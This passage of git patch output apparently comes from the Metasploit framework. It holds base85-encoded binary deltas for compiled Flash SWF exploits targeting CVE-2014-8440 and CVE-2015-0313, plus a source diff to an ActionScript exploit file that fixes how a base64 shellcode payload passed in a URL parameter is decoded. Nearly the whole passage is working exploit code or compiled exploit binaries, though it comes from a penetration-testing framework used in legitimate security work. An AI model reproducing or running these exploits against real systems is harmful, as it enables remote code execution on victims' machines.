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
XJN{A)5AdRaH5=1uSt3RM{v0KiUKY(0

diff --git a/external/source/exploits/CVE-2014-8440/Msf.as b/external/source/exploits/CVE-2014-8440/Msf.as
index d62b3c4561..4497389619 100755
--- a/external/source/exploits/CVE-2014-8440/Msf.as
+++ b/external/source/exploits/CVE-2014-8440/Msf.as
@@ -42,8 +42,11 @@ package
 			this.object_vector_length = 5770 * 2
 			this.byte_array_vector_length = 510 * 2
 			
-			b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
-			payload = b64.toByteArray().toString();
+			var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+			var pattern:RegExp = / /g;
+			b64_payload = b64_payload.replace(pattern, "+")
+			b64.decode(b64_payload)
+			payload = b64.toByteArray().toString()
                         
 			this.initialize_worker_and_ba()
 			if (!this.trigger())

From 23d244b1faefae05fd57797dd14752e6512c486c Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 26 May 2015 16:11:44 -0500
Subject: [PATCH 0202/1013] Fix CVE-2015-0313

---
 data/exploits/CVE-2015-0313/msf.swf           | Bin 17923 -> 18009 bytes
 .../source/exploits/CVE-2015-0313/Main.as     |   7 +++++--
 2 files changed, 5 insertions(+), 2 deletions(-)

diff --git a/data/exploits/CVE-2015-0313/msf.swf b/data/exploits/CVE-2015-0313/msf.swf
index 68b0ad0e6b4e7fe4e914320296148ff37c9c1f7d..f4d5e8f32de2cc716af392728756f7b472967ff0 100755
GIT binary patch
delta 17868
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
